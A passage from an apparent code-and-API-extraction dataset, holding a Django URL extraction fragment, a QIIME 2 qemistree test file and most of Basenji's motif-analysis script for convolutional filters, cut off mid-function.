(['\"\"\"^members$\"\"\"', 'views.household_members'], {'name': '\"\"\"maintain_members\"\"\"'}), \"('^members$', views.household_members, name='maintain_members')\\n\", (293, 356), False, 'from django.conf.urls import include, url\\n'), ((363, 432), 'django.conf.urls.url', 'url', (['\"\"\"^vehicles$\"\"\"', 'views.household_vehicles'], {'name': '\"\"\"maintain_vehicles\"\"\"'}), \"('^vehicles$', views.household_vehicles, name='maintain_vehicles')\\n\", (366, 432), False, 'from django.conf.urls import include, url\\n'), ((439, 513), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/models-by-make/(?P\\\\\\\\d+)/$\"\"\"', 'views.ajax_models_by_make'], {}), \"('^ajax/models-by-make/(?P\\\\\\\\d+)/$', views.ajax_models_by_make)\\n\", (442, 513), False, 'from django.conf.urls import include, url\\n'), ((519, 591), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/makes-by-type/(?P\\\\\\\\d+)/$\"\"\"', 'views.ajax_makes_by_type'], {}), \"('^ajax/makes-by-type/(?P\\\\\\\\d+)/$', views.ajax_makes_by_type)\\n\", (522, 591), False, 'from django.conf.urls import include, url\\n'), ((597, 688), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/add-make/(?P\\\\\\\\d+)/(?P[\\\\\\\\w ]{1,50})/$\"\"\"', 'views.ajax_add_make'], {}), \"('^ajax/add-make/(?P\\\\\\\\d+)/(?P[\\\\\\\\w ]{1,50})/$', views.\\n ajax_add_make)\\n\", (600, 688), False, 'from django.conf.urls import include, url\\n'), ((688, 784), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/add-model/(?P\\\\\\\\d+)/(?P[\\\\\\\\w -]{1,128})/$\"\"\"', 'views.ajax_add_model'], {}), \"('^ajax/add-model/(?P\\\\\\\\d+)/(?P[\\\\\\\\w -]{1,128})/$', views\\n .ajax_add_model)\\n\", (691, 784), False, 'from django.conf.urls import include, url\\n'), ((784, 838), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/delete-invite/$\"\"\"', 'views.ajax_delete_invite'], {}), \"('^ajax/delete-invite/$', views.ajax_delete_invite)\\n\", (787, 838), False, 'from django.conf.urls import include, url\\n'), ((845, 913), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/change-member-status/$\"\"\"', 'views.ajax_change_member_status'], {}), \"('^ajax/change-member-status/$', views.ajax_change_member_status)\\n\", (848, 913), False, 'from django.conf.urls import include, url\\n')]"}}},{"rowIdx":780,"cells":{"code":{"kind":"string","value":"# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2018, QIIME 2 development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nfrom unittest import TestCase, main\nimport qiime2\nimport os\nfrom q2_qemistree import MGFDirFmt, SiriusDirFmt, ZodiacDirFmt, OutputDirs\nfrom q2_qemistree import (compute_fragmentation_trees,\n rerank_molecular_formulas,\n predict_fingerprints)\nfrom q2_qemistree._fingerprint import artifactory\n\n\nclass FingerprintTests(TestCase):\n def setUp(self):\n THIS_DIR = os.path.dirname(os.path.abspath(__file__))\n self.badsirpath = os.path.join(THIS_DIR, 'data/foo/bin')\n self.goodsirpath = os.path.join(THIS_DIR, 'data/'\n 'sirius-linux64-headless-4.0.1/bin')\n # MassSpectrometryFeatures\n self.ions = qiime2.Artifact.load(os.path.join(THIS_DIR,\n 'data/sirius.mgf.qza'))\n # SiriusFolder\n self.sirout = qiime2.Artifact.load(os.path.join(THIS_DIR,\n 'data/sirFolder.qza'))\n # ZodiacFolder\n self.zodout = qiime2.Artifact.load(os.path.join(THIS_DIR,\n 'data/zodFolder.qza'))\n\n def test_artifactory(self):\n # everything is working fine\n obs = os.environ.get('_JAVA_OPTIONS', '')\n res = artifactory(self.goodsirpath, ['--help'],\n constructor=OutputDirs, java_flags='-Xms2G')\n self.assertEqual(obs, os.environ.get('_JAVA_OPTIONS'))\n self.assertTrue(isinstance(res, OutputDirs))\n # exceptions are raised\n with self.assertRaises(OSError):\n res = artifactory(self.badsirpath, ['--help'],\n constructor=OutputDirs)\n\n def test_fragmentation_trees(self):\n ions = self.ions.view(MGFDirFmt)\n result = compute_fragmentation_trees(sirius_path=self.goodsirpath,\n features=ions,\n ppm_max=15, profile='orbitrap')\n contents = os.listdir(result.get_path())\n self.assertTrue(('version.txt' in contents))\n\n def test_fragmentation_trees_negative_ionization(self):\n ions = self.ions.view(MGFDirFmt)\n result = compute_fragmentation_trees(sirius_path=self.goodsirpath,\n features=ions,\n ppm_max=15, profile='orbitrap',\n ionization_mode='negative')\n contents = os.listdir(result.get_path())\n self.assertTrue(('version.txt' in contents))\n\n def test_fragmentation_trees_exception(self):\n ions = self.ions.view(MGFDirFmt)\n with self.assertRaises(ValueError):\n compute_fragmentation_trees(sirius_path=self.goodsirpath,\n features=ions,\n ppm_max=15,\n profile='orbitrap',\n ionization_mode='n3gativ3')\n\n def test_reranking(self):\n ions = self.ions.view(MGFDirFmt)\n sirout = self.sirout.view(SiriusDirFmt)\n result = rerank_molecular_formulas(sirius_path=self.goodsirpath,\n fragmentation_trees=sirout,\n features=ions)\n contents = os.listdir(result.get_path())\n self.assertTrue(('zodiac_summary.csv' in contents))\n\n def test_fingerid(self):\n zodout = self.zodout.view(ZodiacDirFmt)\n result = predict_fingerprints(sirius_path=self.goodsirpath,\n molecular_formulas=zodout, ppm_max=15)\n contents = os.listdir(result.get_path())\n self.assertTrue(('summary_csi_fingerid.csv' in contents))\n\n\nif __name__ == '__main__':\n main()\n"},"apis":{"kind":"list like","value":["q2_qemistree.rerank_molecular_formulas","os.path.join","os.environ.get","q2_qemistree.predict_fingerprints","q2_qemistree.compute_fragmentation_trees","unittest.main","q2_qemistree._fingerprint.artifactory","os.path.abspath"],"string":"[\n \"q2_qemistree.rerank_molecular_formulas\",\n \"os.path.join\",\n \"os.environ.get\",\n \"q2_qemistree.predict_fingerprints\",\n \"q2_qemistree.compute_fragmentation_trees\",\n \"unittest.main\",\n \"q2_qemistree._fingerprint.artifactory\",\n \"os.path.abspath\"\n]"},"extract_api":{"kind":"string","value":"[((4200, 4206), 'unittest.main', 'main', ([], {}), '()\\n', (4204, 4206), False, 'from unittest import TestCase, main\\n'), ((836, 874), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/foo/bin\"\"\"'], {}), \"(THIS_DIR, 'data/foo/bin')\\n\", (848, 874), False, 'import os\\n'), ((902, 966), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/sirius-linux64-headless-4.0.1/bin\"\"\"'], {}), \"(THIS_DIR, 'data/sirius-linux64-headless-4.0.1/bin')\\n\", (914, 966), False, 'import os\\n'), ((1607, 1642), 'os.environ.get', 'os.environ.get', (['\"\"\"_JAVA_OPTIONS\"\"\"', '\"\"\"\"\"\"'], {}), \"('_JAVA_OPTIONS', '')\\n\", (1621, 1642), False, 'import os\\n'), ((1657, 1747), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.goodsirpath', \"['--help']\"], {'constructor': 'OutputDirs', 'java_flags': '\"\"\"-Xms2G\"\"\"'}), \"(self.goodsirpath, ['--help'], constructor=OutputDirs,\\n java_flags='-Xms2G')\\n\", (1668, 1747), False, 'from q2_qemistree._fingerprint import artifactory\\n'), ((2171, 2279), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '\"\"\"orbitrap\"\"\"'}), \"(sirius_path=self.goodsirpath, features=ions,\\n ppm_max=15, profile='orbitrap')\\n\", (2198, 2279), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((2587, 2723), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '\"\"\"orbitrap\"\"\"', 'ionization_mode': '\"\"\"negative\"\"\"'}), \"(sirius_path=self.goodsirpath, features=ions,\\n ppm_max=15, profile='orbitrap', ionization_mode='negative')\\n\", (2614, 2723), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((3535, 3638), 'q2_qemistree.rerank_molecular_formulas', 'rerank_molecular_formulas', ([], {'sirius_path': 'self.goodsirpath', 'fragmentation_trees': 'sirout', 'features': 'ions'}), '(sirius_path=self.goodsirpath, fragmentation_trees\\n =sirout, features=ions)\\n', (3560, 3638), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((3924, 4018), 'q2_qemistree.predict_fingerprints', 'predict_fingerprints', ([], {'sirius_path': 'self.goodsirpath', 'molecular_formulas': 'zodout', 'ppm_max': '(15)'}), '(sirius_path=self.goodsirpath, molecular_formulas=\\n zodout, ppm_max=15)\\n', (3944, 4018), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((783, 808), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\\n', (798, 808), False, 'import os\\n'), ((1086, 1131), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/sirius.mgf.qza\"\"\"'], {}), \"(THIS_DIR, 'data/sirius.mgf.qza')\\n\", (1098, 1131), False, 'import os\\n'), ((1253, 1297), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/sirFolder.qza\"\"\"'], {}), \"(THIS_DIR, 'data/sirFolder.qza')\\n\", (1265, 1297), False, 'import os\\n'), ((1421, 1465), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/zodFolder.qza\"\"\"'], {}), \"(THIS_DIR, 'data/zodFolder.qza')\\n\", (1433, 1465), False, 'import os\\n'), ((1800, 1831), 'os.environ.get', 'os.environ.get', (['\"\"\"_JAVA_OPTIONS\"\"\"'], {}), \"('_JAVA_OPTIONS')\\n\", (1814, 1831), False, 'import os\\n'), ((1977, 2041), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.badsirpath', \"['--help']\"], {'constructor': 'OutputDirs'}), \"(self.badsirpath, ['--help'], constructor=OutputDirs)\\n\", (1988, 2041), False, 'from q2_qemistree._fingerprint import artifactory\\n'), ((3105, 3241), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '\"\"\"orbitrap\"\"\"', 'ionization_mode': '\"\"\"n3gativ3\"\"\"'}), \"(sirius_path=self.goodsirpath, features=ions,\\n ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3')\\n\", (3132, 3241), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n')]"}}},{"rowIdx":781,"cells":{"code":{"kind":"string","value":"#!/usr/bin/env python\n# Copyright 2017 Calico LLC\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# https://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# =========================================================================\nfrom __future__ import print_function\n\nfrom optparse import OptionParser\nimport copy, os, pdb, random, shutil, subprocess, time\n\nimport h5py\nimport matplotlib\nmatplotlib.use('PDF')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import spearmanr\nimport seaborn as sns\nfrom sklearn import preprocessing\nimport tensorflow as tf\n\nimport basenji\n\n'''\nbasenji_motifs.py\n\nCollect statistics and make plots to explore the first convolution layer\nof the given model using the given sequences.\n'''\n\nweblogo_opts = '-X NO -Y NO --errorbars NO --fineprint \"\"'\nweblogo_opts += ' -C \"#CB2026\" A A'\nweblogo_opts += ' -C \"#34459C\" C C'\nweblogo_opts += ' -C \"#FBB116\" G G'\nweblogo_opts += ' -C \"#0C8040\" T T'\n\n################################################################################\n# main\n################################################################################\ndef main():\n usage = 'usage: %prog [options] '\n parser = OptionParser(usage)\n parser.add_option(\n '-a',\n dest='act_t',\n default=0.5,\n type='float',\n help=\n 'Activation threshold (as proportion of max) to consider for PWM [Default: %default]'\n )\n parser.add_option(\n '-d',\n dest='model_hdf5_file',\n default=None,\n help='Pre-computed model output as HDF5.')\n parser.add_option('-o', dest='out_dir', default='.')\n parser.add_option(\n '-m',\n dest='meme_db',\n default='%s/data/motifs/Homo_sapiens.meme' % os.environ['BASENJIDIR'],\n help='MEME database used to annotate motifs')\n parser.add_option(\n '-p',\n dest='plot_heats',\n default=False,\n action='store_true',\n help=\n 'Plot heat maps describing filter activations in the test sequences [Default: %default]'\n )\n parser.add_option(\n '-s',\n dest='sample',\n default=None,\n type='int',\n help='Sample sequences from the test set [Default:%default]')\n parser.add_option(\n '-t',\n dest='trim_filters',\n default=False,\n action='store_true',\n help='Trim uninformative positions off the filter ends [Default: %default]'\n )\n (options, args) = parser.parse_args()\n\n if len(args) != 3:\n parser.error(\n 'Must provide Basenji parameters and model files and test data in HDF5'\n ' format.'\n )\n else:\n params_file = args[0]\n model_file = args[1]\n data_file = args[2]\n\n if not os.path.isdir(options.out_dir):\n os.mkdir(options.out_dir)\n\n #################################################################\n # load data\n\n data_open = h5py.File(data_file)\n\n test_seqs1 = data_open['test_in']\n test_targets = data_open['test_out']\n\n try:\n target_names = list(data_open['target_labels'])\n except KeyError:\n target_names = ['t%d' % ti for ti in range(test_targets.shape[1])]\n\n if options.sample is not None:\n # choose sampled indexes\n sample_i = sorted(random.sample(range(test_seqs1.shape[0]), options.sample))\n\n # filter\n test_seqs1 = test_seqs1[sample_i]\n test_targets = test_targets[sample_i]\n\n # convert to letters\n test_seqs = basenji.dna_io.hot1_dna(test_seqs1)\n\n #################################################################\n # model parameters and placeholders\n\n job = basenji.dna_io.read_job_params(params_file)\n\n job['seq_length'] = test_seqs1.shape[1]\n job['seq_depth'] = test_seqs1.shape[2]\n job['num_targets'] = test_targets.shape[2]\n job['target_pool'] = int(np.array(data_open.get('pool_width', 1)))\n\n t0 = time.time()\n dr = basenji.seqnn.SeqNN()\n dr.build(job)\n print('Model building time %ds' % (time.time() - t0))\n\n # adjust for fourier\n job['fourier'] = 'train_out_imag' in data_open\n if job['fourier']:\n test_targets_imag = data_open['test_out_imag']\n if options.valid:\n test_targets_imag = data_open['valid_out_imag']\n\n #################################################################\n # predict\n\n # initialize batcher\n if job['fourier']:\n batcher_test = basenji.batcher.BatcherF(\n test_seqs1,\n test_targets,\n test_targets_imag,\n batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n else:\n batcher_test = basenji.batcher.Batcher(\n test_seqs1,\n test_targets,\n batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n\n # initialize saver\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n # load variables into session\n saver.restore(sess, model_file)\n\n # get weights\n filter_weights = sess.run(dr.filter_weights[0])\n filter_weights = np.transpose(np.squeeze(filter_weights), [2, 1, 0])\n print(filter_weights.shape)\n\n # test\n t0 = time.time()\n layer_filter_outs, _ = dr.hidden(sess, batcher_test, layers=[0])\n filter_outs = layer_filter_outs[0]\n print(filter_outs.shape)\n\n # store useful variables\n num_filters = filter_weights.shape[0]\n filter_size = filter_weights.shape[2]\n\n #################################################################\n # individual filter plots\n #################################################################\n # also save information contents\n filters_ic = []\n meme_out = meme_intro('%s/filters_meme.txt' % options.out_dir, test_seqs)\n\n for f in range(num_filters):\n print('Filter %d' % f)\n\n # plot filter parameters as a heatmap\n plot_filter_heat(filter_weights[f, :, :],\n '%s/filter%d_heat.pdf' % (options.out_dir, f))\n\n # write possum motif file\n filter_possum(filter_weights[f, :, :], 'filter%d' % f,\n '%s/filter%d_possum.txt' % (options.out_dir,\n f), options.trim_filters)\n\n # plot weblogo of high scoring outputs\n plot_filter_logo(\n filter_outs[:, :, f],\n filter_size,\n test_seqs,\n '%s/filter%d_logo' % (options.out_dir, f),\n maxpct_t=options.act_t)\n\n # make a PWM for the filter\n filter_pwm, nsites = make_filter_pwm('%s/filter%d_logo.fa' %\n (options.out_dir, f))\n\n if nsites < 10:\n # no information\n filters_ic.append(0)\n else:\n # compute and save information content\n filters_ic.append(info_content(filter_pwm))\n\n # add to the meme motif file\n meme_add(meme_out, f, filter_pwm, nsites, options.trim_filters)\n\n meme_out.close()\n\n #################################################################\n # annotate filters\n #################################################################\n # run tomtom\n subprocess.call(\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db),\n shell=True)\n\n # read in annotations\n filter_names = name_filters(\n num_filters, '%s/tomtom/tomtom.txt' % options.out_dir, options.meme_db)\n\n #################################################################\n # print a table of information\n #################################################################\n table_out = open('%s/table.txt' % options.out_dir, 'w')\n\n # print header for later panda reading\n header_cols = ('', 'consensus', 'annotation', 'ic', 'mean', 'std')\n print('%3s %19s %10s %5s %6s %6s' % header_cols, file=table_out)\n\n for f in range(num_filters):\n # collapse to a consensus motif\n consensus = filter_motif(filter_weights[f, :, :])\n\n # grab annotation\n annotation = '.'\n name_pieces = filter_names[f].split('_')\n if len(name_pieces) > 1:\n annotation = name_pieces[1]\n\n # plot density of filter output scores\n fmean, fstd = plot_score_density(\n np.ravel(filter_outs[:, :, f]),\n '%s/filter%d_dens.pdf' % (options.out_dir, f))\n\n row_cols = (f, consensus, annotation, filters_ic[f], fmean, fstd)\n print('%-3d %19s %10s %5.2f %6.4f %6.4f' % row_cols, file=table_out)\n\n table_out.close()\n\n #################################################################\n # global filter plots\n #################################################################\n if options.plot_heats:\n # plot filter-sequence heatmap\n plot_filter_seq_heat(filter_outs, '%s/filter_seqs.pdf' % options.out_dir)\n\n # plot filter-segment heatmap\n plot_filter_seg_heat(filter_outs, '%s/filter_segs.pdf' % options.out_dir)\n plot_filter_seg_heat(\n filter_outs, '%s/filter_segs_raw.pdf' % options.out_dir, whiten=False)\n\n # plot filter-target correlation heatmap\n plot_target_corr(filter_outs, seq_targets, filter_names, target_names,\n '%s/filter_target_cors_mean.pdf' % options.out_dir, 'mean')\n plot_target_corr(filter_outs, seq_targets, filter_names, target_names,\n '%s/filter_target_cors_max.pdf' % options.out_dir, 'max')\n\n\ndef get_motif_proteins(meme_db_file):\n \"\"\" Hash motif_id's to protein names using the MEME DB file \"\"\"\n motif_protein = {}\n for line in open(meme_db_file):\n a = line.split()\n if len(a) > 0 and a[0] == 'MOTIF':\n if a[2][0] == '(':\n motif_protein[a[1]] = a[2][1:a[2].find(')')]\n else:\n motif_protein[a[1]] = a[2]\n return motif_protein\n\n\ndef info_content(pwm, transpose=False, bg_gc=0.415):\n \"\"\" Compute PWM information content.\n\n In the original analysis, I used a bg_gc=0.5. For any\n future analysis, I ought to switch to the true hg19\n value of 0.415.\n \"\"\"\n pseudoc = 1e-9\n\n if transpose:\n pwm = np.transpose(pwm)\n\n bg_pwm = [1 - bg_gc, bg_gc, bg_gc, 1 - bg_gc]\n\n ic = 0\n for i in range(pwm.shape[0]):\n for j in range(4):\n # ic += 0.5 + pwm[i][j]*np.log2(pseudoc+pwm[i][j])\n ic += -bg_pwm[j] * np.log2(\n bg_pwm[j]) + pwm[i][j] * np.log2(pseudoc + pwm[i][j])\n\n return ic\n\n\ndef make_filter_pwm(filter_fasta):\n \"\"\" Make a PWM for this filter from its top hits \"\"\"\n\n nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n pwm_counts = []\n nsites = 4 # pseudocounts\n for line in open(filter_fasta):\n if line[0] != '>':\n seq = line.rstrip()\n nsites += 1\n if len(pwm_counts) == 0:\n # initialize with the length\n for i in range(len(seq)):\n pwm_counts.append(np.array([1.0] * 4))\n\n # count\n for i in range(len(seq)):\n try:\n pwm_counts[i][nts[seq[i]]] += 1\n except KeyError:\n pwm_counts[i] += np.array([0.25] * 4)\n\n # normalize\n pwm_freqs = []\n for i in range(len(pwm_counts)):\n pwm_freqs.append([pwm_counts[i][j] / float(nsites) for j in range(4)])\n\n return np.array(pwm_freqs), nsites - 4\n\n\ndef meme_add(meme_out, f, filter_pwm, nsites, trim_filters=False):\n \"\"\" Print a filter to the growing MEME file\n\n Attrs:\n meme_out : open file\n f (int) : filter index #\n filter_pwm (array) : filter PWM array\n nsites (int) : number of filter sites\n \"\"\"\n if not trim_filters:\n ic_start = 0\n ic_end = filter_pwm.shape[0] - 1\n else:\n ic_t = 0.2\n\n # trim PWM of uninformative prefix\n ic_start = 0\n while ic_start < filter_pwm.shape[0] and info_content(\n filter_pwm[ic_start:ic_start + 1]) < ic_t:\n ic_start += 1\n\n # trim PWM of uninformative suffix\n ic_end = filter_pwm.shape[0] - 1\n while ic_end >= 0 and info_content(filter_pwm[ic_end:ic_end + 1]) < ic_t:\n ic_end -= 1\n\n if ic_start < ic_end:\n print('MOTIF filter%d' % f, file=meme_out)\n print(\n 'letter-probability matrix: alength= 4 w= %d nsites= %d' %\n (ic_end - ic_start + 1, nsites),\n file=meme_out)\n\n for i in range(ic_start, ic_end + 1):\n print('%.4f %.4f %.4f %.4f' % tuple(filter_pwm[i]), file=meme_out)\n print('', file=meme_out)\n\n\ndef meme_intro(meme_file, seqs):\n \"\"\" Open MEME motif format file and print intro\n\n Attrs:\n meme_file (str) : filename\n seqs [str] : list of strings for obtaining background freqs\n\n Returns:\n mem_out : open MEME file\n \"\"\"\n nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n\n # count\n nt_counts = [1] * 4\n for i in range(len(seqs)):\n for nt in seqs[i]:\n try:\n nt_counts[nts[nt]] += 1\n except KeyError:\n pass\n\n # normalize\n nt_sum = float(sum(nt_counts))\n nt_freqs = [nt_counts[i] / nt_sum for i in range(4)]\n\n # open file for writing\n meme_out = open(meme_file, 'w')\n\n # print intro material\n print('MEME version 4', file=meme_out)\n print('', file=meme_out)\n print('ALPHABET= ACGT', file=meme_out)\n print('', file=meme_out)\n print('Background letter frequencies:', file=meme_out)\n print('A %.4f C %.4f G %.4f T %.4f' % tuple(nt_freqs), file=meme_out)\n print('', file=meme_out)\n\n return meme_out\n\n\ndef name_filters(num_filters, tomtom_file, meme_db_file):\n \"\"\" Name the filters using Tomtom matches.\n\n Attrs:\n num_filters (int) : total number of filters\n tomtom_file (str) : filename of Tomtom output table.\n meme_db_file (str) : filename of MEME db\n\n Returns:\n filter_names [str] :\n \"\"\"\n # name by number\n filter_names = ['f%d' % fi for fi in range(num_filters)]\n\n # name by protein\n if tomtom_file is not None and meme_db_file is not None:\n motif_protein = get_motif_proteins(meme_db_file)\n\n # hash motifs and q-value's by filter\n filter_motifs = {}\n\n tt_in = open(tomtom_file)\n tt_in.readline()\n for line in tt_in:\n a = line.split()\n fi = int(a[0][6:])\n motif_id = a[1]\n qval = float(a[5])\n\n filter_motifs.setdefault(fi, []).append((qval, motif_id))\n\n tt_in.close()\n\n # assign filter's best match\n for fi in filter_motifs:\n top_motif = sorted(filter_motifs[fi])[0][1]\n filter_names[fi] += '_%s' % motif_protein[top_motif]\n\n return np.array(filter_names)\n\n\n################################################################################\n# plot_target_corr\n#\n# Plot a clustered heatmap of correlations between filter activations and\n# targets.\n#\n# Input\n# filter_outs:\n# filter_names:\n# target_names:\n# out_pdf:\n################################################################################\ndef plot_target_corr(filter_outs, seq_targets, filter_names, target_names, out_pdf, seq_op='mean'):\n num_seqs = filter_outs.shape[0]\n num_targets = len(target_names)\n\n if seq_op == 'mean':\n filter_outs_seq = filter_outs.mean(axis=2)\n else:\n filter_outs_seq = filter_outs.max(axis=2)\n\n # std is sequence by filter.\n filter_seqs_std = filter_outs_seq.std(axis=0)\n filter_outs_seq = filter_outs_seq[:, filter_seqs_std > 0]\n filter_names_live = filter_names[filter_seqs_std > 0]\n\n filter_target_cors = np.zeros((len(filter_names_live), num_targets))\n for fi in range(len(filter_names_live)):\n for ti in range(num_targets):\n cor, p = spearmanr(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\n filter_target_cors[fi, ti] = cor\n\n cor_df = pd.DataFrame(\n filter_target_cors, index=filter_names_live, columns=target_names)\n\n sns.set(font_scale=0.3)\n plt.figure()\n sns.clustermap(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\n plt.savefig(out_pdf)\n plt.close()\n\n\n################################################################################\n# plot_filter_seq_heat\n#\n# Plot a clustered heatmap of filter activations in\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_filter_seq_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):\n # compute filter output means per sequence\n filter_seqs = filter_outs.mean(axis=2)\n\n # whiten\n if whiten:\n filter_seqs = preprocessing.scale(filter_seqs)\n\n # transpose\n filter_seqs = np.transpose(filter_seqs)\n\n if drop_dead:\n filter_stds = filter_seqs.std(axis=1)\n filter_seqs = filter_seqs[filter_stds > 0]\n\n # downsample sequences\n seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)\n\n hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)\n hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)\n\n sns.set(font_scale=0.3)\n\n plt.figure()\n sns.clustermap(\n filter_seqs[:, seqs_i],\n row_cluster=True,\n col_cluster=True,\n linewidths=0,\n xticklabels=False,\n vmin=hmin,\n vmax=hmax)\n plt.savefig(out_pdf)\n #out_png = out_pdf[:-2] + 'ng'\n #plt.savefig(out_png, dpi=300)\n plt.close()\n\n\n################################################################################\n# plot_filter_seq_heat\n#\n# Plot a clustered heatmap of filter activations in sequence segments.\n#\n# Mean doesn't work well for the smaller segments for some reason, but taking\n# the max looks OK. Still, similar motifs don't cluster quite as well as you\n# might expect.\n#\n# Input\n# filter_outs\n################################################################################\ndef plot_filter_seg_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):\n b = filter_outs.shape[0]\n f = filter_outs.shape[1]\n l = filter_outs.shape[2]\n\n s = 5\n while l / float(s) - (l / s) > 0:\n s += 1\n print('%d segments of length %d' % (s, l / s))\n\n # split into multiple segments\n filter_outs_seg = np.reshape(filter_outs, (b, f, s, l / s))\n\n # mean across the segments\n filter_outs_mean = filter_outs_seg.max(axis=3)\n\n # break each segment into a new instance\n filter_seqs = np.reshape(np.swapaxes(filter_outs_mean, 2, 1), (s * b, f))\n\n # whiten\n if whiten:\n filter_seqs = preprocessing.scale(filter_seqs)\n\n # transpose\n filter_seqs = np.transpose(filter_seqs)\n\n if drop_dead:\n filter_stds = filter_seqs.std(axis=1)\n filter_seqs = filter_seqs[filter_stds > 0]\n\n # downsample sequences\n seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)\n\n hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)\n hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)\n\n sns.set(font_scale=0.3)\n if whiten:\n dist = 'euclidean'\n else:\n dist = 'cosine'\n\n plt.figure()\n sns.clustermap(\n filter_seqs[:, seqs_i],\n metric=dist,\n row_cluster=True,\n col_cluster=True,\n linewidths=0,\n xticklabels=False,\n vmin=hmin,\n vmax=hmax)\n plt.savefig(out_pdf)\n #out_png = out_pdf[:-2] + 'ng'\n #plt.savefig(out_png, dpi=300)\n plt.close()\n\n\n################################################################################\n# filter_motif\n#\n# Collapse the filter parameter matrix to a single DNA motif.\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef filter_motif(param_matrix):\n nts = 'ACGT'\n\n motif_list = []\n for v in range(param_matrix.shape[1]):\n max_n = 0\n for n in range(1, 4):\n if param_matrix[n, v] > param_matrix[max_n, v]:\n max_n = n\n\n if param_matrix[max_n, v] > 0:\n motif_list.append(nts[max_n])\n else:\n motif_list.append('N')\n\n return ''.join(motif_list)\n\n\n################################################################################\n# filter_possum\n#\n# Write a Possum-style motif\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef filter_possum(param_matrix, motif_id, possum_file, trim_filters=False, mult=200):\n # possible trim\n trim_start = 0\n trim_end = param_matrix.shape[1] - 1\n trim_t = 0.3\n if trim_filters:\n # trim PWM of uninformative prefix\n while trim_start < param_matrix.shape[1] and np.max(\n param_matrix[:, trim_start]) - np.min(\n param_matrix[:, trim_start]) < trim_t:\n trim_start += 1\n\n # trim PWM of uninformative suffix\n while trim_end >= 0 and np.max(param_matrix[:, trim_end]) - np.min(\n param_matrix[:, trim_end]) < trim_t:\n trim_end -= 1\n\n if trim_start < trim_end:\n possum_out = open(possum_file, 'w')\n print('BEGIN GROUP', file=possum_out)\n print('BEGIN FLOAT', file=possum_out)\n print('ID %s' % motif_id, file=possum_out)\n print('AP DNA', file=possum_out)\n print('LE %d' % (trim_end + 1 - trim_start), file=possum_out)\n for ci in range(trim_start, trim_end + 1):\n print(\n 'MA %s' % ' '.join(['%.2f' % (mult * n)\n for n in param_matrix[:, ci]]),\n file=possum_out)\n print('END', file=possum_out)\n print('END', file=possum_out)\n\n possum_out.close()\n\n\n################################################################################\n# plot_filter_heat\n#\n# Plot a heatmap of the filter's parameters.\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_filter_heat(param_matrix, out_pdf):\n param_range = abs(param_matrix).max()\n\n sns.set(font_scale=2)\n plt.figure(figsize=(param_matrix.shape[1], 4))\n sns.heatmap(\n param_matrix,\n cmap='PRGn',\n linewidths=0.2,\n vmin=-param_range,\n vmax=param_range)\n ax = plt.gca()\n ax.set_xticklabels(range(1, param_matrix.shape[1] + 1))\n ax.set_yticklabels('TGCA', 